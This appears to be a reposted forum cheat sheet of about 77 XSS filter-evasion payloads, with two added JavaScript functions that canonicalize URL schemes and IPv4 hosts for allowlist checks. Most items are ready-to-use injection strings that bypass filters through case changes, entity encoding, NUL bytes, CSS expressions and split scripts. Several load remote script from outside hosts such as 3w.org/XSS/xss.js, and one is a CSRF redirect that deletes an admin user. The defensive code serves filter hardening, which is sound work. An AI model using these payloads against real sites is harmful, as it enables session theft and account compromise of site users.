It seems there isn't much XSS material on t00ls, so I'm copying over something good I came across; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag, corrected
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (all pieces on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the filter's JavaScript escaping
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters inserted (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (an open angle bracket followed by a name starting with a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE approach
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
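Defender-side example added here; it is not part of the original post or of the cheat sheet it copies. Items 3 to 19 and 31 to 53 all come down to one thing: a javascript:/vbscript: URL placed in a URL-bearing attribute (SRC, HREF, BACKGROUND, DYNSRC, LOWSRC) or a CSS url(), disguised by mixed case, HTML entity encoding with or without semicolons, embedded tabs/newlines, NUL bytes or leading whitespace and control characters. A filter that searches the raw string for "javascript:" misses every one of them. The check below decodes and canonicalizes the value roughly the way a browser's URL parser does and then allowlists the scheme. The function names and the scheme allowlist are assumptions, and the sample inputs are constructed from the payloads above.

```javascript
// Added example, not code from the original post. Canonicalize a URL value
// taken from an attribute (href/src/background/...) or a CSS url() before
// deciding whether its scheme is acceptable. Names are assumptions.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Named references that matter for URL smuggling; everything else is numeric.
// Lookup is case-sensitive like the HTML spec (&Tab; is defined, &TAB; is not).
const NAMED_ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'", Tab: "\t", NewLine: "\n" };

// Decode &#106; / &#x6A; / &amp; style references. Browsers accept numeric
// references inside attributes even without the trailing semicolon (items 9/10).
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1] === "x" || body[1] === "X";
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, body) ? NAMED_ENTITIES[body] : match;
  });
}

// Mimic what URL parsers do before scheme detection: drop NUL bytes (items 17/18),
// strip leading/trailing control and whitespace characters (item 19; the extra
// codepoints listed in item 47 are included on the assumption that legacy engines
// tolerated them there), and remove tab/CR/LF anywhere (items 11-14).
function canonicalizeUrl(raw) {
  let s = decodeEntities(String(raw));
  s = s.replace(/\u0000/g, "");
  s = s.replace(/^[\u0001-\u0020\u00a0\u2000-\u200b\u3000\ufeff]+|[\u0001-\u0020\u00a0\u2000-\u200b\u3000\ufeff]+$/g, "");
  s = s.replace(/[\t\n\r]/g, "");
  return s;
}

// Scheme of an absolute URL, lower-cased (item 4); null for relative URLs.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// true when the value is safe to emit in a URL attribute: relative, or an
// allowlisted scheme. Anything else (javascript:, vbscript:, data:) is rejected.
function isSafeUrlAttribute(raw) {
  const scheme = schemeOf(canonicalizeUrl(raw));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed inputs modelled on the payloads above (not taken verbatim).
const SAMPLES = [
  "javascript:alert('XSS')",                                                   // item 3
  "JaVaScRiPt:alert('XSS')",                                                   // item 4
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // item 8 style
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",       // item 10 style
  "jav&#x09;ascript:alert('XSS');",                                            // item 12
  "jav\nascript:alert('XSS');",                                                // item 13
  "java\u0000script:alert(\"XSS\")",                                           // item 17
  " &#14; javascript:alert('XSS');",                                           // item 19
  "vbscript:msgbox(\"XSS\")",                                                  // item 40
  "http://example.com/img.png",                                                // benign absolute URL
  "/images/logo.png",                                                          // benign relative URL
];

// Returns [value, safe?] pairs; only the two benign entries come back true.
function classifySamples() {
  return SAMPLES.map((s) => [s, isSafeUrlAttribute(s)]);
}
```

This is a scheme check only; it belongs next to, not instead of, context-aware output encoding of the attribute value, and for CSS the same function is applied to the string inside url(). Rejecting the whole value (rather than stripping the offending prefix) avoids the classic bypass where removing "javascript:" once leaves "javajavascript:script:" behind.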
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP as decimal
<A HREF="http://3232235521">XSS</A>
(71) IP as hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP as octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
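Items 70 to 77 are about the link target rather than the markup: the same host can be written as a decimal, hex, octal or mixed IPv4 literal, with or without the trailing dot, with tabs and newlines inside the URL, or replaced by a javascript: scheme altogether, so a link allowlist that compares raw strings is easy to get past. Added example, not code from the original post: canonicalize the host the way the WHATWG URL parser handles IPv4 literals, then compare against the allowlist. Function names and the allowlist contents are assumptions; the inputs are constructed from the post's own link payloads.

```javascript
// Added example, not code from the original post. Canonicalize the host of a
// link before comparing it against an allowlist. Names are assumptions.

// Parse one dotted part the way the WHATWG URL IPv4 parser does:
// "0x.." is hex, a leading 0 means octal, otherwise decimal. Returns null
// when the part is not numeric (so the host is a DNS name, not an address).
function parseIpv4Part(part) {
  let radix = 10;
  let digits = part;
  if (/^0x/i.test(part)) { radix = 16; digits = part.slice(2); }
  else if (part.length > 1 && part[0] === "0") { radix = 8; digits = part.slice(1); }
  if (digits === "") return 0;                       // "0x" on its own is 0
  const valid = radix === 16 ? /^[0-9a-f]+$/i : radix === 8 ? /^[0-7]+$/ : /^[0-9]+$/;
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Turn any numeric IPv4 literal (item 70: 3232235521, item 71: 0xc0.0xa8.0x00.0x01,
// item 72: 0300.0250.0000.0001, item 73: 66.000146.0x7.147) into dotted-quad.
// Returns null if the host is not an IPv4 literal.
function canonicalIpv4(host) {
  const parts = host.split(".");
  if (parts.length > 1 && parts[parts.length - 1] === "") parts.pop(); // trailing dot
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = parts.map((p) => parseIpv4Part(p));
  if (nums.some((n) => n === null)) return null;
  // Every part but the last must fit in one byte; the last part supplies
  // the remaining low-order bytes (this is what makes 3232235521 valid).
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;
  let value = last;
  for (let i = 0; i < nums.length - 1; i++) value += nums[i] * 256 ** (3 - i);
  return [24, 16, 8, 0].map((shift) => Math.floor(value / 2 ** shift) % 256).join(".");
}

// Host of an absolute or scheme-relative http(s) URL after removing the
// tab/CR/LF characters browsers ignore (item 73), dropping userinfo and port,
// and normalizing case and the trailing dot (item 76). Returns null for
// anything that is not an http(s) URL, which covers item 77's javascript: link.
function canonicalHost(rawUrl) {
  const url = String(rawUrl).replace(/[\t\n\r]/g, "");
  const m = /^(?:https?:)?\/\/([^/?#]*)/i.exec(url);
  if (!m) return null;
  let host = m[1].replace(/^.*@/, "").replace(/:\d+$/, "").toLowerCase();
  if (host.length > 1 && host.endsWith(".")) host = host.slice(0, -1);
  const ip = canonicalIpv4(host);
  return ip !== null ? ip : host;
}

// Allowlist check on the canonical host; the caller decides what to do with a
// rejected link (drop the href, route it through a warning page, log it, ...).
function isAllowedLink(rawUrl, allowedHosts) {
  const host = canonicalHost(rawUrl);
  return host !== null && allowedHosts.has(host);
}

// Constructed inputs: the link targets from items 70-77. The allowlist is an
// assumption chosen so that the three spellings of 192.168.0.1 collapse to one entry.
const ALLOWED = new Set(["www.google.com", "google.com", "192.168.0.1"]);
const LINKS = [
  "http://3232235521",                                     // item 70, decimal
  "http://0xc0.0xa8.0x00.0x01",                            // item 71, hex
  "http://0300.0250.0000.0001",                            // item 72, octal
  "h\ntt\tp://6\t6.000146.0x7.147/",                        // item 73, mixed, with embedded tab/newline
  "//www.google.com/",                                     // item 74
  "http://google.com/",                                    // item 75
  "http://www.google.com./",                               // item 76
  "javascript:document.location='http://www.google.com/'", // item 77
];

// One record per link: the canonical host and whether it passes the allowlist.
function checkLinks() {
  return LINKS.map((l) => ({ link: l, host: canonicalHost(l), allowed: isAllowedLink(l, ALLOWED) }));
}
```

Node's built-in WHATWG URL class performs the same IPv4 normalization (new URL("http://0xc0.0xa8.0x00.0x01").hostname gives "192.168.0.1"), so in production code the hand-written parser above can be replaced by that; it is spelled out here so the decimal/hex/octal rules from items 70-73 are visible.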
Original source: http://fuzzexp.org/u/0day/?p=14